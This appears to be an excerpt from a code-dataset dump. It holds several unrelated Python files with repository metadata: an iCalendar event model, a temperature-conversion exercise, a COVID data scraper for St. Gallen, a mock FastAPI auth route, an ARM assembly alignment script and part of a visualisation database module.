return receive_answer(recv_client)
try:
andino_tcp.start()
client.connect()
lines = input_file.splitlines()
for line in lines:
if line: # ignore empty lines
client.send(line)
output.append(receive_answer(client))
finally:
andino_tcp.stop()
client.stop()
return output
| 35.144928 | 94 | 0.559072 |
145bf8f33506af3436b279951420b57309f70547
| 1,881 |
py
|
Python
|
src/onegov/event/models/occurrence.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/event/models/occurrence.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/event/models/occurrence.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from datetime import datetime
from icalendar import Calendar as vCalendar
from icalendar import Event as vEvent
from onegov.core.orm import Base
from onegov.core.orm.mixins import TimestampMixin
from onegov.core.orm.types import UUID
from onegov.event.models.mixins import OccurrenceMixin
from pytz import UTC
from sedate import to_timezone
from sqlalchemy import Column
from sqlalchemy import ForeignKey
from uuid import uuid4
class Occurrence(Base, OccurrenceMixin, TimestampMixin):
""" Defines an occurrence of an event. """
__tablename__ = 'event_occurrences'
#: Internal number of the occurence
id = Column(UUID, primary_key=True, default=uuid4)
#: Event this occurrence belongs to
event_id = Column(UUID, ForeignKey('events.id'), nullable=False)
def as_ical(self, url=None):
""" Returns the occurrence as iCalendar string. """
modified = self.modified or self.created or datetime.utcnow()
event = self.event
vevent = vEvent()
vevent.add('uid', f'{self.name}@onegov.event')
vevent.add('summary', self.title)
vevent.add('dtstart', to_timezone(self.start, UTC))
vevent.add('dtend', to_timezone(self.end, UTC))
vevent.add('last-modified', modified)
vevent.add('dtstamp', modified)
vevent.add('location', self.location)
vevent.add('description', event.description)
vevent.add('categories', event.tags)
if event.coordinates:
vevent.add('geo', (event.coordinates.lat, event.coordinates.lon))
if url:
vevent.add('url', url)
vcalendar = vCalendar()
vcalendar.add('prodid', '-//OneGov//onegov.event//')
vcalendar.add('version', '2.0')
vcalendar.add_component(vevent)
return vcalendar.to_ical()
@property
def access(self):
return self.event.access
| 33.589286 | 77 | 0.679957 |
148cf3455ad4b2a5da7b6d2039c42f57a3fd5de9
| 769 |
py
|
Python
|
___Python/Thomas/pycurs_180625/p02_datenstrukturen/m01_temperatur.py
|
uvenil/PythonKurs201806
|
85afa9c9515f5dd8bec0c546f077d8cc39568fe8
|
[
"Apache-2.0"
] | null | null | null |
___Python/Thomas/pycurs_180625/p02_datenstrukturen/m01_temperatur.py
|
uvenil/PythonKurs201806
|
85afa9c9515f5dd8bec0c546f077d8cc39568fe8
|
[
"Apache-2.0"
] | null | null | null |
___Python/Thomas/pycurs_180625/p02_datenstrukturen/m01_temperatur.py
|
uvenil/PythonKurs201806
|
85afa9c9515f5dd8bec0c546f077d8cc39568fe8
|
[
"Apache-2.0"
] | null | null | null |
celsius = [0.7, 2.1, 4.2, 8.2, 12.5, 15.6, 16.9, 16.3, 13.6, 9.5, 4.6, 2.3] #Durschnittstemperaturen Bielefeld
# Liste Umrechnung in Fahrenheit erzeugen (FOR-Schleife)
wertefahrenheit = []
for wertecelsius in celsius:
wertefahrenheit.append(round((wertecelsius*1.8)+32, 2)) # F = C*1.8 + 32 C = (F-32)/1.8
print(wertefahrenheit)
# Liste Umrechnung in Fahrenheit erzeugen (LIST Comprehension)
print('Werte Fahrenheit')
wertefahrenheit = [wertecelsius * 1.8 +32 for wertecelsius in celsius]
print(wertefahrenheit)
# Liste Umrechnung in Fahrenheit mit Temperaturen in Celsius >= 15°C
print('Werte Fahrenheit (Celsius>=15°C)')
wertefahrenheit = [wertecelsius* 1.8 +32 for wertecelsius in celsius if wertecelsius >= 15]
print(wertefahrenheit)
| 40.473684 | 111 | 0.715215 |
dce32a847718277eaf7bd48272a69f797dc47f06
| 3,894 |
py
|
Python
|
scrapers/scrape_sg.py
|
AryaVashisht/covid_19
|
0c734615a1190a5b2fff4697f47731ef2b8b6918
|
[
"CC-BY-4.0"
] | null | null | null |
scrapers/scrape_sg.py
|
AryaVashisht/covid_19
|
0c734615a1190a5b2fff4697f47731ef2b8b6918
|
[
"CC-BY-4.0"
] | null | null | null |
scrapers/scrape_sg.py
|
AryaVashisht/covid_19
|
0c734615a1190a5b2fff4697f47731ef2b8b6918
|
[
"CC-BY-4.0"
] | null | null | null |
#!/usr/bin/env python3
import csv
from io import StringIO
import re
from bs4 import BeautifulSoup
import scrape_common as sc
# hospitalized
url_hospitalized = 'https://stada.sg.ch/covid/C19_Faelle_hospitalisiert.html'
soup = BeautifulSoup(sc.download(url_hospitalized, silent=True), 'html.parser')
dd_hosp = sc.DayData(canton='SG', url=url_hospitalized)
hosp_table = soup.find('table')
hosp_date = hosp_table.find_next(string=re.compile("Stand")).string
dd_hosp.datetime = sc.find(r'Stand:?\s*(.+[0-9]{4})', hosp_date)
rows = hosp_table.find_all('tr')
headers = rows[0].find_all('td') or rows[0].find_all('th')
assert len(headers) == 2, f"Number of header columns changed, {len(headers)} != 2"
assert headers[1].text.strip() == "Anzahl"
for i in range(1, len(rows)):
cells = rows[i].find_all('td')
if cells[0].text.strip() == 'Total Covid-19 Patienten':
dd_hosp.hospitalized = cells[1].text
elif cells[0].text.strip() == '...davon auf Intensivstation ohne Beatmung':
dd_hosp.icu = int(cells[1].text)
elif cells[0].text.strip() == '...davon auf Intensivstation mit Beatmung':
dd_hosp.vent = int(cells[1].text)
if dd_hosp.vent:
dd_hosp.icu += dd_hosp.vent
print(dd_hosp)
print('-' * 10)
# isolated / quarantined cases
url_isolated = 'https://stada.sg.ch/covid/ContactTracing.html'
soup = BeautifulSoup(sc.download(url_isolated, silent=True), 'html.parser')
dd_isolated = sc.DayData(canton='SG', url=url_isolated)
isolated_table = soup.find('table')
isolated_date = isolated_table.find_next(string=re.compile("Stand")).string
dd_isolated.datetime = sc.find(r'Stand:?\s*(.+[0-9]{4})', isolated_date)
rows = isolated_table.find_all('tr')
headers = rows[0].find_all('td') or rows[0].find_all('th')
assert len(headers) == 2, f"Number of header columns changed, {len(headers)} != 2"
assert headers[1].text.strip() == "Anzahl"
for i in range(1, len(rows)):
cells = rows[i].find_all('td')
if cells[0].text.strip() == 'Positiv Getestete im Tracing / in Isolation':
value = cells[1].text.strip()
if sc.represents_int(value):
dd_isolated.isolated = int(value)
elif cells[0].text.strip() == 'Kontaktpersonen im Tracing / in Quarantäne':
value = cells[1].text.strip()
if sc.represents_int(value):
dd_isolated.quarantined = int(value)
if dd_isolated:
print(dd_isolated)
print('-' * 10)
# historized cases
csv_url = 'https://www.sg.ch/ueber-den-kanton-st-gallen/statistik/covid-19/_jcr_content/Par/sgch_downloadlist/DownloadListPar/sgch_download.ocFile/KantonSG_C19-Faelle_download.csv'
d = sc.download(csv_url, silent=True)
# strip the "header" / description lines
d = "\n".join(d.split("\n")[5:])
reader = csv.DictReader(StringIO(d), delimiter=';')
for row in reader:
dd = sc.DayData(canton='SG', url=csv_url)
dd.datetime = row['Falldatum']
dd.cases = row['Total Kanton SG (kumuliert)']
print(dd)
print('-' * 10)
# latest cases
url_cases = 'https://stada.sg.ch/covid/BAG_uebersicht.html'
soup = BeautifulSoup(sc.download(url_cases, silent=True), 'html.parser')
dd_cases = sc.DayData(canton='SG', url=url_cases)
cases_table = soup.find('table')
hosp_date = cases_table.find_next(string=re.compile("Stand")).string
dd_cases.datetime = sc.find(r'Stand:?\s*(.+[0-9]{4})', hosp_date)
rows = cases_table.find_all('tr')
headers = rows[0].find_all('td') or rows[0].find_all('th')
assert len(headers) == 2, f"Number of header columns changed, {len(headers)} != 2"
assert headers[1].text.strip() == "Anzahl"
for row in rows:
cells = row.find_all('td')
if len(cells) == 2:
if cells[0].text.strip() == 'Laborbestätigte Fälle kumuliert (seit März 2020)':
dd_cases.cases = cells[1].string
elif cells[0].text.strip() == 'Todesfälle kumuliert (seit März 2020)':
dd_cases.deaths = cells[1].string
print(dd_cases)
| 35.4 | 180 | 0.686954 |
b4e026119906125ce08226b14d48784a13373c72
| 568 |
py
|
Python
|
_dev/license-retrival-mock-server/src/routers/auth.py
|
univention/bildungslogin
|
29bebe858a5445dd5566aad594b33b9dd716eca4
|
[
"MIT"
] | null | null | null |
_dev/license-retrival-mock-server/src/routers/auth.py
|
univention/bildungslogin
|
29bebe858a5445dd5566aad594b33b9dd716eca4
|
[
"MIT"
] | null | null | null |
_dev/license-retrival-mock-server/src/routers/auth.py
|
univention/bildungslogin
|
29bebe858a5445dd5566aad594b33b9dd716eca4
|
[
"MIT"
] | null | null | null |
from fastapi import APIRouter, Form
from pydantic import BaseModel
router = APIRouter(prefix="/auth", tags=["Auth"])
class AuthResponse(BaseModel):
""" Response model for get_license_package """
access_token: str
token_type: str
expires_in: int
scope: str
@router.post("", response_model=AuthResponse)
def auth(scope: str = Form(...)):
""" Mock auth endpoint """
return AuthResponse(access_token="dummy_token",
token_type="bearer",
expires_in=28800,
scope=scope)
| 25.818182 | 51 | 0.621479 |
d32f2610b782a381e4bd41b423fd3f38295718ca
| 4,294 |
py
|
Python
|
fix-alignment.py
|
Dia-B/polymul-z2mx-m4
|
7b4cde2ba913557f28397b03dfcc7cfaeda06295
|
[
"CC0-1.0"
] | 34 |
2019-02-15T05:11:49.000Z
|
2022-03-23T08:00:29.000Z
|
Cortex-M_Implementation_KEM/Cortex-M4/src/m4-striding/fix-alignment.py
|
cothan/SABER
|
4743134da0e4a695491b6c2de60e17f21d2d241f
|
[
"Unlicense"
] | 8 |
2020-04-09T12:33:42.000Z
|
2022-03-07T20:08:41.000Z
|
Cortex-M_Implementation_KEM/Cortex-M4/src/m4-striding/fix-alignment.py
|
cothan/SABER
|
4743134da0e4a695491b6c2de60e17f21d2d241f
|
[
"Unlicense"
] | 10 |
2020-03-09T15:09:50.000Z
|
2022-03-23T08:00:18.000Z
|
from collections import defaultdict
import sys
import subprocess
import argparse
"""
This script widens ARMv7-M instructions in-place to 32-bit if required.
It will accept two 16 bit instructions on the same 4-byte data line, but will
expand 16 bit instructions to 32 bit if that ensures alignment for subsequent
32 bit instructions. This prevents wasted cycles for misaligned fetches.
Flag -v results in a line of output to stderr per widened instruction.
"""
parser = argparse.ArgumentParser(description='Widen ARMv7-M instructions.')
parser.add_argument('filename', metavar='filename', type=str,
help='the plain assembly file (modified inplace)')
parser.add_argument('--verbose', '-v', action='count',
help='enable output for every widened instruction')
args = parser.parse_args()
funcs = defaultdict(list)
obj = args.filename.replace('.s', '.o')
dump = args.filename.replace('.s', '.dump')
# create an object dump of the assembly file
subprocess.run(["arm-none-eabi-gcc", f"{args.filename}", "-mthumb", "-mcpu=cortex-m4", "-mfloat-abi=hard", "-mfpu=fpv4-sp-d16", "-c", "-o", f"{obj}"], check=True)
subprocess.run(["arm-none-eabi-objdump", "-D", f"{obj}"], stdout=open(dump, 'w'), stderr=subprocess.DEVNULL)
func = None
# parse the functions from the object dump
with open(dump, 'r') as f:
for line in f:
if len(line) >= 10 and line[9] == '<':
func = line[10:-3]
elif len(line) == 0:
func = None
elif func:
if len(line.split('\t')) >= 3:
address, code, *ins = line.split('\t')
if ins[0] == 'bl':
# grab the function name
ins[1] = ''.join(ins[1].split(' ')[1:])[1:-2]
ins = ' '.join(ins).split(';')[0].strip()
funcs[func].append({'address': int(address[:-1], 16),
'ins': ins, 'width': None})
subprocess.run(["rm", f"{obj}"])
subprocess.run(["rm", f"{dump}"])
for func in funcs:
# get widths of all instructions
for i, ins in enumerate(funcs[func]):
try:
nextins = funcs[func][i+1]
ins['width'] = nextins['address'] - ins['address']
except IndexError:
# we cannot determine the width of the last element, but that does
# not matter; the last bx is always two bytes wide.
break
aligned = True
alignedfuncs = defaultdict(list)
def widen(ins):
if args.verbose:
print(f"Widening '{ins['ins']}' at {hex(ins['address'])}", file=sys.stderr)
ins = ins['ins'].split(" ")
if ins[0][-2:] == '.w':
raise Exception(f"Cannot widen already wide instruction {ins}")
ins[0] += '.w'
return ' '.join(ins)
def can_widen(ins):
# So far this is the only exception we care about
if ins[:3] == 'add' and ins[-2:] == 'sp':
return False
return True
for func in funcs:
for i, ins in enumerate(funcs[func]):
if ins['ins'][:2] == 'bx' or ins['width'] is None:
alignedfuncs[func].append(ins['ins'])
break
else:
nextins = funcs[func][i+1] # nextins exists, since we halt at bx
if ins['width'] == 4 or not can_widen(ins['ins']): # cannot do anything
alignedfuncs[func].append(ins['ins'])
elif nextins['width'] == 2: # delay the decision
aligned = not aligned # flip alignment
alignedfuncs[func].append(ins['ins'])
elif nextins['width'] == 4:
if aligned: # need to stay aligned
alignedfuncs[func].append(widen(ins))
else: # we automatically get aligned
alignedfuncs[func].append(ins['ins'])
aligned = True
func = None
output = []
# take the functions from the object dump and insert them in the asm
with open(args.filename, 'r') as f:
for i, line in enumerate(f):
if not func:
output.append(line.strip())
if ':' in line:
func = line.replace(':', '').strip()
if 'bx lr' in line:
output += alignedfuncs[func]
func = None
with open(args.filename, 'w') as f:
for ins in output:
f.write(ins + '\n')
| 34.910569 | 162 | 0.574057 |
2c9e4d46f2895b2625c441497e08218c5cac4356
| 73,996 |
py
|
Python
|
src/visuanalytics/server/db/queries.py
|
Biebertal-mach-mit-TV/Data-Analytics
|
70cda2393e61f7ca0a1a4a5965646e908bd0faa9
|
[
"MIT"
] | 1 |
2020-11-27T17:26:27.000Z
|
2020-11-27T17:26:27.000Z
|
src/visuanalytics/server/db/queries.py
|
Biebertal-mach-mit-TV/Data-Analytics
|
70cda2393e61f7ca0a1a4a5965646e908bd0faa9
|
[
"MIT"
] | 85 |
2021-01-02T11:38:59.000Z
|
2021-07-26T07:13:47.000Z
|
src/visuanalytics/server/db/queries.py
|
Biebertal-mach-mit-TV/Data-Analytics
|
70cda2393e61f7ca0a1a4a5965646e908bd0faa9
|
[
"MIT"
] | 1 |
2021-04-19T06:50:53.000Z
|
2021-04-19T06:50:53.000Z
|
import json
import os
import shutil
import io
import re
import time
import humps
import copy
from base64 import b64encode, encodebytes
from copy import deepcopy
from PIL import Image
from visuanalytics.server.db import db
from visuanalytics.util.config_manager import get_private, set_private, assert_private_exists
from visuanalytics.analytics.processing.image.matplotlib.diagram import generate_test_diagram
from visuanalytics.util.resources import IMAGES_LOCATION as IL, AUDIO_LOCATION as AL, MEMORY_LOCATION as ML, open_resource, get_datasource_path
from visuanalytics.util.infoprovider_utils import generate_step_transform
INFOPROVIDER_LOCATION = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../resources/infoprovider"))
VIDEOJOB_LOCATION = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../resources/steps"))
DATASOURCE_LOCATION = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../resources/datasources"))
TEMP_LOCATION = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../resources/temp"))
SCENE_LOCATION = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../resources/scenes"))
STEPS_LOCATION = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../resources/steps"))
IMAGE_LOCATION = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../resources", IL))
AUDIO_LOCATION = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../resources", AL))
MEMORY_LOCATION = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../resources", ML))
def get_infoprovider_list():
"""
Methode für das Laden aller Infoprovider.
:return: Liste von Namen und ID's aller Infoprovider.
"""
con = db.open_con_f()
res = con.execute("SELECT infoprovider_id, infoprovider_name FROM infoprovider")
return [{"infoprovider_id": row["infoprovider_id"], "infoprovider_name": row["infoprovider_name"]} for row in res]
def update_url_pattern(pattern):
"""
Falls die URL, die für eine Request übergeben wird, schon eine Query enthält, wird diese aufgelöst,
damit die Paramter dem Request-Objekt als Dictionary übergeben werden können
:param pattern: URL mit Query (http...?...)
:type pattern: str
:return: Die Basis-URL ohne Query-Teil und Paramter als Dictionary
"""
params = {}
pattern = pattern.split("?")
url = pattern[0]
if len(pattern) > 1:
param_list = pattern[1].split("&")
for param in param_list:
values = param.split("=")
params.update({
values[0]: values[1]
})
return url, params
def insert_infoprovider(infoprovider):
"""
Methode für das einfügen eines neuen Infoproviders.
:param infoprovider: Ein Dictionary welches den Namen des Infoproviders, den Schedule sowie die Steps 'diagrams',
'diagrams_original' sowie einen Key 'datasources', welcher alle Datenquellen beinhaltet, enthält.
:type infoprovider: dict
:return: Gibt an, ob das Hinzufügen erfolgreich war.
"""
con = db.open_con_f()
assert_private_exists()
infoprovider_name = infoprovider["infoprovider_name"]
datasources = copy.deepcopy(infoprovider["datasources"])
diagrams = remove_toplevel_key(infoprovider["diagrams"])
diagrams_original = infoprovider["diagrams_original"]
arrays_used_in_diagrams = infoprovider["arrays_used_in_diagrams"]
transform_step = []
# Api obj vorbereiten
api_step = {
"type": "request_multiple_custom",
"use_loop_as_key": True,
"steps_value": [],
"requests": []
}
for datasource in datasources:
api_key_name = f"{infoprovider['infoprovider_name']}_{datasource['datasource_name']}_APIKEY" if datasource["api"]["method"] != "noAuth" and datasource["api"]["method"] != "BasicAuth" else None
header, parameter = generate_request_dicts(datasource["api"]["api_info"], datasource["api"]["method"], api_key_name=api_key_name)
url, params = update_url_pattern(datasource["api"]["api_info"]["url_pattern"])
parameter.update(params)
req_data = {
"type": datasource["api"]["api_info"]["type"],
"method": datasource["api"]["api_info"].get("method", "GET"),
"url_pattern": url,
"headers": header,
"params": parameter,
"response_type": datasource["api"]["response_type"]
}
if api_key_name:
req_data.update({"api_key_name": api_key_name})
api_step["steps_value"].append(datasource["datasource_name"])
api_step["requests"].append(req_data)
# Transform obj vorbereiten
transform_step = []
for datasource in datasources:
transform_step += datasource["transform"]
transform_step += datasource["calculates"]
formulas = copy.deepcopy(datasource["formulas"])
custom_keys = _extract_custom_keys(datasource["calculates"], datasource["formulas"], datasource["replacements"])
transform_step = _generate_transform(_extend_formula_keys(formulas, datasource["datasource_name"], custom_keys), remove_toplevel_key(transform_step))
transform_step += remove_toplevel_key(datasource["replacements"])
datasources_copy = deepcopy(infoprovider["datasources"])
for datasource in datasources_copy:
api_key_name_temp = datasource["api"]["api_info"].get("api_key_name", None)
if api_key_name_temp:
datasource["api"]["api_info"]["api_key_name"] = api_key_name_temp.split("||")[0] + "||"
# Json für das Speicher vorbereiten
infoprovider_json = {
"name": infoprovider_name,
"api": api_step,
"transform": transform_step,
"images": diagrams,
"run_config": {},
"datasources": datasources_copy,
"diagrams_original": diagrams_original,
"arrays_used_in_diagrams": arrays_used_in_diagrams
}
# Nachschauen ob ein Infoprovider mit gleichem Namen bereits vorhanden ist
count = con.execute("SELECT COUNT(*) FROM infoprovider WHERE infoprovider_name=?", [infoprovider_name]).fetchone()["COUNT(*)"]
if count > 0:
return False
infoprovider_id = con.execute("INSERT INTO infoprovider (infoprovider_name) VALUES (?)",
[infoprovider_name]).lastrowid
for datasource in datasources:
datasource_name = datasource["datasource_name"]
api_key_name = f"{infoprovider['infoprovider_name']}_{datasource['datasource_name']}_APIKEY" if datasource["api"]["method"] != "noAuth" and datasource["api"]["method"] != "BasicAuth" else None
header, parameter = generate_request_dicts(datasource["api"]["api_info"], datasource["api"]["method"], api_key_name=api_key_name)
url, params = update_url_pattern(datasource["api"]["api_info"]["url_pattern"])
parameter.update(params)
req_data = {
"type": datasource["api"]["api_info"]["type"],
"method": datasource["api"]["api_info"].get("method", "GET"),
"url_pattern": url,
"headers": header,
"params": parameter,
"response_type": datasource["api"]["response_type"]
}
if api_key_name:
req_data.update({"api_key_name": api_key_name})
datasource_api_step = {
"type": "request_multiple_custom",
"use_loop_as_key": True,
"steps_value": [datasource_name],
"requests": [req_data]
}
# Datasource obj vorbereiten
transform_step = []
transform_step += datasource["transform"]
transform_step += datasource["calculates"]
formulas = copy.deepcopy(datasource["formulas"])
custom_keys = _extract_custom_keys(datasource["calculates"], datasource["formulas"], datasource["replacements"])
transform_step = _generate_transform(_extend_formula_keys(formulas, datasource_name, custom_keys), remove_toplevel_key(transform_step))
transform_step += remove_toplevel_key(datasource["replacements"])
datasource_json = {
"name": datasource_name,
"api": datasource_api_step,
"transform": transform_step,
"storing": _generate_storing(datasource["historized_data"], datasource_name, custom_keys, datasource["storing"]) if datasource["api"]["api_info"]["type"] != "request_memory" else [],
"run_config": {}
}
if len(datasource_json["storing"]) > 0 and datasource["api"]["api_info"]["type"] != "request_memory":
# Schedule für Datasource abspeichern
schedule_historisation = datasource["schedule"]
schedule_historisation_id = _insert_historisation_schedule(con, schedule_historisation)
# Datenquelle in Datenbank speichern
con.execute("INSERT INTO datasource (datasource_name, schedule_historisation_id, infoprovider_id)"
" VALUES (?, ?, ?)",
[datasource_name, schedule_historisation_id, infoprovider_id])
# add request memory, if datasource stores data
use_last = get_max_use_last(infoprovider_json["images"])
for storing_config in datasource_json["storing"]:
datasource_json["api"]["steps_value"].append(f"{datasource_json['name']}_{storing_config['key'].replace('_req|', '').replace(datasource_json['name'] + '|','').replace('|', '_')}_HISTORY")
datasource_json["api"]["requests"].append({
"type": "request_memory",
"name": dict(storing_config)["name"],
"memory_folder": infoprovider_name + "_" + datasource_name,
"use_last": use_last,
"alternative": {
"type": "input",
"data": [-1 for _ in range(use_last)]
}
})
else:
con.execute("INSERT INTO datasource (datasource_name, infoprovider_id) VALUES (?, ?)",
[datasource_name, infoprovider_id])
# Datasource-Json in den Ordner "/datasources" speichern
with open_resource(_get_datasource_path(infoprovider_name.replace(" ", "-") + "_" + datasource_name.replace(" ", "-")), "wt") as f:
json.dump(datasource_json, f)
# Infoprovider-Json in den Ordner "/infoproviders" speichern
with open_resource(_get_infoprovider_path(infoprovider_name.replace(" ", "-")), "wt") as f:
json.dump(infoprovider_json, f)
con.commit()
for diagram_name, diagram in diagrams.items():
generate_test_diagram(diagram, infoprovider_name=infoprovider_name, diagram_name=diagram_name)
return True
def insert_video_job(video, update=False, job_id=None):
"""
Methode für das einfügen und aktualisieren eines Videojobs.
Falls ein bestehender Videojob aktualisiert werden soll, muss die job_id angegeben werden.
:param video: Ein Dictionary, welches die Konfiguration eines Videojobs enthält.
:type video: dict
:param update: Wahrheitswert, der aussagt, ob ein bestehender Videojob aktualisiert werden soll.
:type update: bool
:param job_id: ID des schon bestehenden Videojobs.
:type job_id: int
:return: Gibt einen boolschen Wert zurück (Status), oder eine Fehlermeldung (bei Aktualisierungen).
"""
con = db.open_con_f()
video_name = video["videojob_name"]
tts_infoprovider_ids = video["tts_ids"]
tts_names = []
infoprovider_names = [infoprovider["infoprovider_name"] for infoprovider in video["selectedInfoprovider"]]
video["audio"] = remove_toplevel_key(video["audio"])
# Namen aller Infoprovider die in TTS genutzt werden laden
for tts_id in tts_infoprovider_ids:
tts_name = con.execute("SELECT infoprovider_name FROM infoprovider WHERE infoprovider_id=?",
[tts_id]).fetchone()["infoprovider_name"]
if tts_name not in infoprovider_names:
tts_names.append(tts_name)
infoprovider_names += tts_names
count = con.execute("SELECT COUNT(*) FROM job WHERE job_name=?", [video_name]).fetchone()["COUNT(*)"]
if count > 0 and not update:
return False
# Daten aller verwendeten Infoprovider sammeln und kombinieren
scene_names = [x["sceneName"] for x in video["sceneList"]]
infoprovider_id_list = [list(con.execute("SELECT infoprovider_id FROM scene INNER JOIN scene_uses_infoprovider AS uses ON scene.scene_id = uses.scene_id WHERE scene_name=?", [scene_name])) for scene_name in scene_names]
infoprovider_ids = []
for id in infoprovider_id_list:
infoprovider_ids += id
infoprovider_ids = [x["infoprovider_id"] for x in infoprovider_ids]
infoprovider_file_names = [get_infoprovider_file(id) for id in infoprovider_ids]
infoprovider_names = [get_infoprovider_name(id) for id in infoprovider_ids]
for infoprovider_name, file_name in zip(infoprovider_names, infoprovider_file_names):
with open_resource(file_name, "r") as f:
infoprovider = json.load(f)
datasource_files = [x for x in os.listdir(get_datasource_path("")) if x.startswith(infoprovider_name + "_")]
for file in datasource_files:
with open_resource(_get_datasource_path(file.replace(".json", ""))) as f:
datasource_config = json.load(f)
api_config = video.get("api", None)
if api_config:
video["api"]["steps_value"] += datasource_config["api"]["steps_value"]
video["api"]["requests"] += datasource_config["api"]["requests"]
else:
video["api"] = datasource_config["api"]
transform_config = video.get("transform", None)
if transform_config:
video["transform"] += datasource_config["transform"]
else:
video.update({
"transform": datasource_config["transform"]
})
diagram_config = video.get("diagrams", None)
if diagram_config:
# video["diagrams"] += infoprovider["images"]
video["diagrams"].update(infoprovider["images"])
else:
video.update({
"diagrams": infoprovider["images"]
})
# Restliche Daten sammeln und kombinieren
images = video.get("images", None)
scene_names = list(map(lambda x: images[x]["key"], list(images.keys())))
scenes = get_scene_list()
scenes = list(filter(lambda x: x["scene_name"] in scene_names, scenes))
scene_ids = list(map(lambda x: x["scene_id"], scenes))
scenes = list(map(lambda x: get_scene(x["scene_id"]), scenes))
for k, v in images.items():
images[k] = list(filter(lambda x: x["name"] == v["key"], scenes))[0]["images"]
video["images"] = images
video["storing"] = []
video["run_config"] = {}
video["presets"] = {}
video["info"] = ""
video["name"] = video_name
schedule = video.get("schedule", None)
delete_schedule = video.get("deleteSchedule", {
"type": "keepCount",
"keepCount": 5
})
if not schedule:
return False if not update else {"err_msg": "could not read schedule from JSON"}
# Neue Json-Datei speichern
with open_resource(_get_videojob_path(video_name.replace(" ", "-")), "wt") as f:
json.dump(video, f)
# Neuen Job erstellen / updaten
if not update:
topic_id = add_topic_get_id(video_name, video_name.replace(" ", "-"))
job = {
"jobName": video_name,
"schedule": schedule,
"deleteSchedule": delete_schedule,
"topicValues": [
{
"topicId": topic_id
}
]
}
insert_job(job, config=False)
else:
topic_id = list(filter(lambda x: x["topicName"] == video_name, get_topic_names()))[0]["topicId"]
job = {
"jobName": video_name,
"schedule": schedule,
"deleteSchedule": delete_schedule,
"topicValues": [
{
"topicId": topic_id
}
]
}
update_job(job_id, job, config=False)
# Einträge in Tabelle job_uses_scene updaten
job_id = con.execute("SELECT job_id FROM job WHERE job_name=?", [video_name]).fetchone()["job_id"]
con.execute("DELETE FROM job_uses_scene WHERE job_id=?", [job_id])
for scene_id in scene_ids:
con.execute("INSERT INTO job_uses_scene (job_id, scene_id, scene_is_preview) VALUES (?, ?, ?)", [job_id, scene_id, False])
con.commit()
return True if not update else None
def get_videojob(job_id):
"""
Methode, die die Konfiguration eines Videojobs zurück in das Format überführt,
welches für das Frontend zum bearbeiten verständlich ist.
:param job_id: ID des Videojobs, welcher zuürckgeliefert werden soll.
:type job_id: int
:return: JSON für das Frontend.
"""
job_list = get_job_list()
videojob = list(filter(lambda x: x["jobId"] == job_id, job_list))[0]
with open(_get_videojob_path(videojob["jobName"].replace(" ", "-")), "r") as f:
video_json = json.load(f)
video_json.pop("api", None)
video_json.pop("transform", None)
video_json.pop("storing", None)
video_json.pop("run_config", None)
video_json.pop("presets", None)
video_json.pop("info", None)
video_json.pop("diagrams", None)
return video_json
def show_schedule():
"""
Läd alle Einträge in der Tabelle 'schedule_historisation'.
"""
con = db.open_con_f()
res = con.execute("SELECT schedule_historisation_id, type FROM schedule_historisation")
return [{"schedule_historisation_id": row["schedule_historisation_id"], "type": row["type"]} for row in res]
def show_weekly():
"""
Läd alle Einträge in der Tabelle 'schedule_historisation_weekday'.
"""
con = db.open_con_f()
res = con.execute("SELECT * FROM schedule_historisation_weekday")
return [{"schedule_weekday_historisation_id": row["schedule_weekday_historisation_id"], "weekday": row["weekday"], "schedule_historisation_id": row["schedule_historisation_id"]} for row in res]
def get_infoprovider_file(infoprovider_id):
"""
Generiert den Pfad zu der Datei eines gegebenen Infoproviders anhand seiner ID.
:param infoprovider_id: ID des Infoproviders.
:type infoprovider_id: int
:return: Pfad zu der JSON-Datei des Infoproviders.
"""
con = db.open_con_f()
# Namen des gegebenen Infoproviders laden
res = con.execute("SELECT infoprovider_name FROM infoprovider WHERE infoprovider_id = ?",
[infoprovider_id]).fetchone()
con.commit()
return _get_infoprovider_path(res["infoprovider_name"].replace(" ", "-")) if res is not None else None
def get_datasource_file(datasource_id):
"""
Läd den Pfad zu der JSON-Datei einer gegebenen Datenquelle.
:param datasource_id: ID der Datenquelle.
:type datasource_id: int
:return: Pfad zu JSON-Datei der Datenquelle.
"""
con = db.open_con_f()
# Namen der gegebenen Datenquelle laden
datasource_name = con.execute("SELECT datasource_name FROM datasource WHERE datasource_id=?",
[datasource_id]).fetchone()["datasource_name"]
infoprovider_name = con.execute("SELECT infoprovider_name FROM infoprovider INNER JOIN datasource USING (infoprovider_id) WHERE datasource_id=?",
[datasource_id]).fetchone()["infoprovider_name"]
con.commit()
return _get_datasource_path(infoprovider_name.replace(" ", "-") + "_" + datasource_name.replace(" ", "-")) if datasource_name is not None else None
def get_infoprovider_name(infoprovider_id):
"""
Läd den Namen eines Infoproviders aus der Datenbank.
:param infoprovider_id: ID des Infoproviders.
:type infoprovider_id: int
"""
con = db.open_con_f()
# Namen des gegebenen Infoproviders laden
res = con.execute("SELECT infoprovider_name FROM infoprovider WHERE infoprovider_id = ?",
[infoprovider_id]).fetchone()
con.commit()
return res["infoprovider_name"].replace(" ", "-")
def get_infoprovider(infoprovider_id):
"""
Methode für das Laden eines Infoproviders anhand seiner ID.
:param infoprovider_id: ID des Infoproviders.
:type infoprovider_id: int
:return: Die JSON-Datei des Infoproviders.
"""
# Laden der Json-Datei des Infoproviders
with open_resource(get_infoprovider_file(infoprovider_id), "r") as f:
infoprovider_json = json.loads(f.read())
for datasource in infoprovider_json["datasources"]:
api_key_name = f"{infoprovider_json['name']}_{datasource['datasource_name']}_APIKEY" if datasource["api"]["method"] != "noAuth" and datasource["api"]["method"] != "BasicAuth" else None
private_config = get_private()
if api_key_name:
